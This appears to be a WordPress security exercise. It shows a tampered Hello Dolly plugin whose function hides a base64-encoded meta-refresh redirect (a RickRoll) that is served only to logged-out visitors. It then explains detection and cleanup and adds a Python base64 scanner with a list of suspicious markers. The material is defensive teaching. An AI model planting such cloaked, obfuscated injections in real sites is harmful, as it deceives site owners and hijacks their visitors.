Install and activate the attached plugin.

hello-dolly.zip

Expected Outcome

When activated, if you’re logged in, nothing happens.

Visit your site as a non-logged in user, however, and you’ll be redirected in 5 seconds to a page we all know and love.


How to fix

Open the file /wp-content/plugins/hello.php and you will find the following function:

// Runs on every front-end page load via the wp_head hook.
function hello_dolly_singalong() {
    // Only fires for visitors who are NOT logged in, so the site owner never sees it.
    if ( ! is_user_logged_in() ) {
        // The payload is hidden behind base64 so a casual grep for "refresh" or a URL finds nothing.
        echo base64_decode( 'PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iNTtVUkw9aHR0cDovL3d3dy55b3V0dWJlLmNvbS93YXRjaD92PW9IZzVTSllSSEEwIj4=' );
    }
}
add_action( 'wp_head', 'hello_dolly_singalong' );

What does that mean? A call to base64_decode() is a huge warning flag: legitimate WordPress themes and plugins almost never need to decode an obfuscated string at runtime, and when they do, the string is rarely echoed straight into the page. There are a few benign uses of base64 you will run into. For example, if you see this in a stylesheet, it is probably fine:

div.image {
    width: 100px;
    height: 100px;
    background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIA...);
}

That is just base64 used to embed a small image inline as a data URI, so the browser can display it without a separate request. (It does not compress anything; the encoded form is about a third larger than the raw image.)

The code in hello.php is not that kind of use. To see what it actually does, decode the string. I like to use Coderstoolbox for this: paste the string PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iNTtVUkw9aHR0cDovL3d3dy55b3V0dWJlLmNvbS93YXRjaD92PW9IZzVTSllSSEEwIj4= into the decoder. If you would rather not paste something you suspect is malicious into a third-party website, the same decode can be done locally with echo '<string>' | base64 -d on Linux or macOS.

[Screenshot: the string decoded in Coderstoolbox]

Voila! Someone’s RickRolling us!

<meta http-equiv="refresh" content="5;URL=http://www.youtube.com/watch?v=oHg5SJYRHA0">

Remove both the function and the add_action() line that registers it (leaving the hook in place while deleting the function would break the site, since WordPress would try to call a function that no longer exists), or delete the tampered plugin altogether. Then change all of your passwords, and work out how the file was modified in the first place, because whoever edited it had write access to your plugin directory.
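Hunting for this by hand works for one plugin, but the same check is easy to automate. The script below is an added example, not part of the original exercise or of WordPress: it scans PHP, CSS and JS sources for base64_decode() calls with a literal string argument and for base64 data URIs, decodes each one, and classifies the result as an image (the benign case above), suspicious (decoded bytes that look like HTML, script or PHP), or unknown. The sample files it scans are constructed inline from the snippets on this page; the scan_directory() helper and the marker lists are my own assumptions about what is worth flagging, not a WordPress API.

```python
import base64
import binascii
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the tampered hello.php from this exercise plus a
# stylesheet with a benign data URI (a 1x1 PNG). Not real files on disk.
SAMPLE_FILES: Dict[str, str] = {
    "wp-content/plugins/hello.php": """<?php
function hello_dolly_singalong() {
    if ( ! is_user_logged_in() ) {
        echo base64_decode('PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iNTtVUkw9aHR0cDovL3d3dy55b3V0dWJlLmNvbS93YXRjaD92PW9IZzVTSllSSEEwIj4=');
    }
}
add_action('wp_head', 'hello_dolly_singalong');
""",
    "wp-content/themes/demo/style.css": """div.image {
    background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==);
}
""",
}

# base64_decode('...') with a literal argument; whitespace inside the literal is
# allowed because attackers (and MIME wrapping) often break long strings across lines.
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
# data:<mime>;base64,<payload> as used in CSS background-image and <img src>.
DATA_URI = re.compile(r"data:([\w.+-]+/[\w.+-]+);base64,([A-Za-z0-9+/=]+)")

# Magic bytes of image formats that legitimately show up as data URIs.
IMAGE_MAGIC = (b"\x89PNG", b"GIF8", b"\xff\xd8\xff", b"RIFF")
# Assumed markers: decoded content containing these is almost certainly injected markup or code.
SUSPICIOUS_MARKERS = (b"<meta", b"<script", b"<iframe", b"http-equiv",
                      b"eval(", b"<?php", b"base64_decode", b"document.write")

SOURCE_EXTENSIONS = (".php", ".css", ".js", ".html")


@dataclass
class Finding:
    path: str
    kind: str      # "base64_decode" or "data-uri"
    verdict: str   # "image", "suspicious" or "unknown"
    decoded: bytes


def safe_decode(payload: str) -> Optional[bytes]:
    """Strictly decode a base64 payload, returning None if it is not valid base64."""
    try:
        return base64.b64decode(re.sub(r"\s+", "", payload), validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(decoded: bytes) -> str:
    """Images are expected; anything that decodes to markup or code is not."""
    if decoded.startswith(IMAGE_MAGIC):
        return "image"
    lowered = decoded.lower()
    if any(marker in lowered for marker in SUSPICIOUS_MARKERS):
        return "suspicious"
    return "unknown"


def scan_source(path: str, text: str) -> List[Finding]:
    """Scan one file's contents for base64 payloads and classify each one."""
    findings: List[Finding] = []
    for kind, pattern, group in (("base64_decode", B64_CALL, 2), ("data-uri", DATA_URI, 2)):
        for match in pattern.finditer(text):
            decoded = safe_decode(match.group(group))
            if decoded is None:
                continue  # not decodable as base64; nothing to judge
            findings.append(Finding(path, kind, classify(decoded), decoded))
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Scan an in-memory mapping of path -> source text (used for the sample)."""
    findings: List[Finding] = []
    for path, text in files.items():
        findings.extend(scan_source(path, text))
    return findings


def scan_directory(root: str) -> List[Finding]:
    """Walk a real tree such as wp-content/ and scan every source file in it."""
    findings: List[Finding] = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(SOURCE_EXTENSIONS):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(full, fh.read()))
    return findings


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.verdict:10} {f.kind:14} {f.path}: {f.decoded[:60]!r}")
```

Run it against a live install with scan_directory("wp-content") and triage the "suspicious" and "unknown" results first; the "image" hits are the data-URI case described above and can usually be ignored. The scanner only catches literal strings, so a payload assembled from pieces at runtime still needs a human reading the code.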